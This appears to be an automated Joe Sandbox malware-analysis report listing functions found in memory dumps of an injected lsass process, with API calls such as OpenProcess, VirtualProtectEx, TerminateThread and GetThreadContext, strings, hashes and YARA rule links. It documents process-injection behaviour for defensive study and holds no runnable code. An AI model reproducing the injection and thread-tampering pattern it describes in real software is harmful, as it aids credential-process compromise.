Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 7cacd31a13f8bd69b7d1cba4a03d538e2fc40b6f9e8b78d1d6473c68a0818879
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: E9418D73215B80D7E760DF62E44879AB7A1F389B85F00812AEBC907B98DF39D165CB00

Function 00000264CD7C69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000264CD7C6A18
__scrt_acquire_startup_lock.LIBCMT ref: 00000264CD7C6A6A
_RTC_Initialize.LIBCMT ref: 00000264CD7C6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000264CD7C6ABE
__scrt_release_startup_lock.LIBCMT ref: 00000264CD7C6AE9

Memory Dump Source

Source File: 0000001C.00000002.3740227777.00000264CD7C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CD7C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cd7c0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 3a3278be3eb944127dc92ebabfb9a7d84a4adb283885d999c1320310fd356ae0
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 3081B4716036418EFB60BB25949939E66E1EBC5780F54402BAAC9477E6DF3BC886F700

Function 00000264CDEC75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000264CDEC7618
__scrt_acquire_startup_lock.LIBCMT ref: 00000264CDEC766A
_RTC_Initialize.LIBCMT ref: 00000264CDEC7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000264CDEC76BE
__scrt_release_startup_lock.LIBCMT ref: 00000264CDEC76E9

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: d6bb239275f87fc1b87c099b11c4a9cad02a07fa482cb5c285d9c771b5385c6c
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 9881DF32702F4186FB60BB2B9849399E291ABC5B83F488117AAC9477D6DF3BC841C710

Function 00000264CDE675F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000264CDE67618
__scrt_acquire_startup_lock.LIBCMT ref: 00000264CDE6766A
_RTC_Initialize.LIBCMT ref: 00000264CDE67698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000264CDE676BE
__scrt_release_startup_lock.LIBCMT ref: 00000264CDE676E9

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 139ff77a64c022a36510e17f8c6812e5fe6cf1a877a391ab8f1af3361236617f
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: DD81DE30B16E4986FB90BB2B9C4D359E691AB95780F084127DAD847BD6DB3BC887C710

Function 00000264CDEC9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00000264CDEC9889
GetLastError.KERNEL32 ref: 00000264CDEC9897
LoadLibraryExW.KERNEL32 ref: 00000264CDEC98C1
FreeLibrary.KERNEL32 ref: 00000264CDEC9907
GetProcAddress.KERNEL32 ref: 00000264CDEC9913

Strings

api-ms-, xrefs: 00000264CDEC98A9

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 6fb5caa3b41d0a9ec0f09aa72d0c33aff852e3cde548422c98f383eb43512dac
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 42318332213E5091FF21BB16A808799F394BB89BA6F5A4526EDAF4B3D4DF39C545C300

Function 00000264CDED1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000264CDED1BCD
GetLastError.KERNEL32 ref: 00000264CDED1BD9
CloseHandle.KERNEL32 ref: 00000264CDED1BF1
CreateFileW.KERNEL32 ref: 00000264CDED1C1C
WriteConsoleW.KERNEL32 ref: 00000264CDED1C3B

Strings

CONOUT$, xrefs: 00000264CDED1BFD

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 0f540cc47abc7de829656ba950a516495839d3c9813a9c7940a0807952202c22
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 2A118C31315F8086E750AB56E848319F2A0F789FE4F044226EA9E877E4DF7AC904C740

Function 00000264CDE71B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000264CDE71BCD
GetLastError.KERNEL32 ref: 00000264CDE71BD9
CloseHandle.KERNEL32 ref: 00000264CDE71BF1
CreateFileW.KERNEL32 ref: 00000264CDE71C1C
WriteConsoleW.KERNEL32 ref: 00000264CDE71C3B

Strings

CONOUT$, xrefs: 00000264CDE71BFD

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 5367408ccd27ef5a2ead000e91cd403a7935bcd3964ca860a654652e286ed480
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 66116D31315F4086E7D0AB56E848319B7A0F7A8FE4F154226EAAD877D4DF7AC944C740

Function 00000264CDEC5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000264CDEC5C4B
GetThreadContext.KERNEL32 ref: 00000264CDEC5DB5

Part of subcall function 00000264CDEC5A40: GetCurrentThreadId.KERNEL32 ref: 00000264CDEC5A44

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 30401e458cd077b803d132f6171a156489fb0ac0ff2011bf7512ffab2a379263
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 04D17A76209F8885DA70EB1AE49835ABBA0F3C8B85F154216EACD47BA5DF39C551CB00

Function 00000264CDEC30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000264CDEC30D7
HeapAlloc.KERNEL32 ref: 00000264CDEC30EA
StrCmpNIW.SHLWAPI ref: 00000264CDEC316B
GetProcessHeap.KERNEL32 ref: 00000264CDEC31D1
HeapFree.KERNEL32 ref: 00000264CDEC31DF

Strings

dialer, xrefs: 00000264CDEC3164

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 73e0c4fa667e6b0186b592c333188a5d26e09fd7e816f8891a56c486dcfddb71
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 2531A431702F5196EB55EF16A848269F7A0FB86B95F0440229EC907B95EF3AC4A1C700

Function 00000264CDEC1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000264CDEC1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000264CDEC1A58
PathFindFileNameW.SHLWAPI ref: 00000264CDEC1A67
lstrlenW.KERNEL32 ref: 00000264CDEC1A73
StrCpyW.SHLWAPI ref: 00000264CDEC1A86
CloseHandle.KERNEL32 ref: 00000264CDEC1A94

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: cc4f7e7364e70e4f9557aed5f66862b4420a1027fec92d21b3883763ed9d0d91
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: BD014C31702E4196EB14EB12A85C759B3A1F789FC1F888536DEDA437A4DE3EC989C740

Function 00000264CDE61A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000264CDE61A3A
K32GetModuleFileNameExW.KERNEL32 ref: 00000264CDE61A58
PathFindFileNameW.SHLWAPI ref: 00000264CDE61A67
lstrlenW.KERNEL32 ref: 00000264CDE61A73
StrCpyW.SHLWAPI ref: 00000264CDE61A86
CloseHandle.KERNEL32 ref: 00000264CDE61A94

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: 2099689bd2c738bc54f774edc34a9219526f6f0e203b03c2c072c8b06705764a
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: D6016D31301E4196EB90EB12A85C759B3A1F798FC0F494436DE99437A4DE3EC9C6C300

Function 00000264CDEC37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000264CDEC37C8
GetCurrentProcess.KERNEL32 ref: 00000264CDEC37D6
VirtualProtectEx.KERNEL32 ref: 00000264CDEC37F8
GetCurrentProcess.KERNEL32 ref: 00000264CDEC3819
VirtualProtectEx.KERNEL32 ref: 00000264CDEC383A
TerminateThread.KERNEL32 ref: 00000264CDEC3849

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 9da738751505d4ae19c79d2275fea11b326daeb001f1bb1972f9eb155a149032
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 8D11C975612F4186EB24AB61E81D756B6A0BB99B86F040526CD8A477D4EF3EC408C700

Function 00000264CDE637AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000264CDE637C8
GetCurrentProcess.KERNEL32 ref: 00000264CDE637D6
VirtualProtectEx.KERNEL32 ref: 00000264CDE637F8
GetCurrentProcess.KERNEL32 ref: 00000264CDE63819
VirtualProtectEx.KERNEL32 ref: 00000264CDE6383A
TerminateThread.KERNEL32 ref: 00000264CDE63849

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 2ed3d75750eeb82ecb4e82a19d585f8dbd8914a6786635fcf8b65b45e78c9842
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: C4115775202F4582FBA4AB21E80D75AF3A0BB68F85F05042ACA99077E4EF3EC048C700

Function 00000264CDEC90D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000264CDEC9103
_IsNonwritableInCurrentImage.LIBCMT ref: 00000264CDEC9198
RtlUnwindEx.NTDLL ref: 00000264CDEC91E7

Strings

csm, xrefs: 00000264CDEC917E
f, xrefs: 00000264CDEC9116

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: b89b84656607917ed171d64e85b91a8a6fc7c463a6f2c68c31a085c05e105a97
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: 7C519D32712A408AEB18EF25E84CB59B7A5F384B9AF518126EED7477C8DB36D941C700

Function 00000264CDEC1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000264CDEC1AD8
StrCmpNIW.SHLWAPI ref: 00000264CDEC1AF2
lstrlenW.KERNEL32 ref: 00000264CDEC1B01
StrCpyW.SHLWAPI ref: 00000264CDEC1B16

Strings

\\?\, xrefs: 00000264CDEC1AE6

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 34e6d6fcbdd7d7114704e6bb2636472879c56de8a36e3503a92f628b4b2ebd2f
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: C8F04472305A4192E720AF21F5D8359A760F785B89F848022CACD47698DE2DC648CB00

Function 00000264CDEC3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000264CDEC3222
StrCpyW.SHLWAPI ref: 00000264CDEC3232
StrCatW.SHLWAPI ref: 00000264CDEC323E
PathCombineW.SHLWAPI ref: 00000264CDEC324C

Strings

\\.\pipe\, xrefs: 00000264CDEC3218

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 8d61b3463e4434e08c44b016341cc879efbba72915470a550519b321fdb6b26c
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 99F08C34705F9092EA04AB13B948219F220BB88FD0F089133DEDB07BA8DE2DC581C700

Function 00000264CDE63200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 00000264CDE63222
StrCpyW.SHLWAPI ref: 00000264CDE63232
StrCatW.SHLWAPI ref: 00000264CDE6323E
PathCombineW.SHLWAPI ref: 00000264CDE6324C

Strings

\\.\pipe\, xrefs: 00000264CDE63218

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 5a1e529a602f7a016db15079801d228ab5110b453d1151e3713c500dbe82786f
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 0DF08C34305F8192EB90AB13B94C119F221EB98FD0F098133DEEA47BA9DE2DC482C300

Function 00000264CDECA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000264CDECA154
GetProcAddress.KERNEL32 ref: 00000264CDECA16A
FreeLibrary.KERNEL32 ref: 00000264CDECA187

Strings

CorExitProcess, xrefs: 00000264CDECA163
mscoree.dll, xrefs: 00000264CDECA14B

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 46e86e358e2dd0c7fb2b5c86649f51b9d6b0629d5aeb59655f5bf1fb1eb0d438
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 65F01271323F4491EF546B60E88C365B360AB88BD1F44201B959B857F4DF29C488C710

Function 00000264CDEC51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000264CDEC5236

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: f92431b1290363adea3848730fc4be086eca8523be9be82ce36047fcc2108078
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 6302B83621AB8486E760DB59E49835EFBA0F3C4795F105116EACE87BA9DF7DC484CB00

Function 00000264CDE651B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000264CDE65236

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 913cb4acbca527cfd2825a12da5fd0c31555ba001c8f62f7b884fb33ea5c327d
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 4002A93621AB8486E7A0DB55E89835EF7A0F3C5B94F104116EACE87BA9DF7DC445CB00

Function 00000264CDED0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000264CDED08A2
GetConsoleMode.KERNEL32 ref: 00000264CDED0960
GetLastError.KERNEL32 ref: 00000264CDED09EA

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 44701e00dfa6c3dcb00c628109f4a46651e9f0ef874d17875ae378de855528b5
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 81819D32B12E5089FB60BF6598483ADA6A0F784B98F584217DE8B57BD6DF36C441C710

Function 00000264CDEC57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000264CDEC5806

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: e6c767ff09bdecf8d6ae217cb8ed0336ad88dafb9b1ac8f1a9d66ab914c42a70
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 4E61973651AF40C6E760AB15E49831ABBA0F3C8755F505226EACE47BE8DB7EC540CF00

Function 00000264CD7D12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000264CD7D12E0
_set_statfp.LIBCMT ref: 00000264CD7D12FB
_set_statfp.LIBCMT ref: 00000264CD7D1317
_set_statfp.LIBCMT ref: 00000264CD7D1353

Memory Dump Source

Source File: 0000001C.00000002.3740227777.00000264CD7C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CD7C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cd7c0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: f3db86746eb451d9993fcb930e21521867c5358be8829401970fe9136d9dd0d1
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 7311D672A57F0101F7A431A9E96E3A91141AB94374F484637EEF716BDB8E3A8C42F200

Function 00000264CDED1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000264CDED1EE0
_set_statfp.LIBCMT ref: 00000264CDED1EFB
_set_statfp.LIBCMT ref: 00000264CDED1F17
_set_statfp.LIBCMT ref: 00000264CDED1F53

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 6a42dc3100b972974f01075fb971a5204e65d406b79dffd87bb3218712037a24
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: D411D672A5BF0105F7A83168E55E36AD041BF64374F48463BFAFB063E68F6A8C42C200

Function 00000264CDE71EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000264CDE71EE0
_set_statfp.LIBCMT ref: 00000264CDE71EFB
_set_statfp.LIBCMT ref: 00000264CDE71F17
_set_statfp.LIBCMT ref: 00000264CDE71F53

Memory Dump Source

Source File: 0000001C.00000002.3746748138.00000264CDE60000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDE60000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cde60000_lsass.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: be8eb660aa5ad454824e4027bd4b829204cc50be60dd3c0b408d46f0dc59929f
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 7B117032A5AF0101F7EC3168E85E36AD051BF74374F5B6627EAF6063D68B5A8C42C200

Function 00000264CDEC9658 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000264CDEC9677
SetLastError.KERNEL32 ref: 00000264CDEC96FE

Memory Dump Source

Source File: 0000001C.00000002.3747922298.00000264CDEC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000264CDEC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_264cdec0000_lsass.jbxd

Similarity

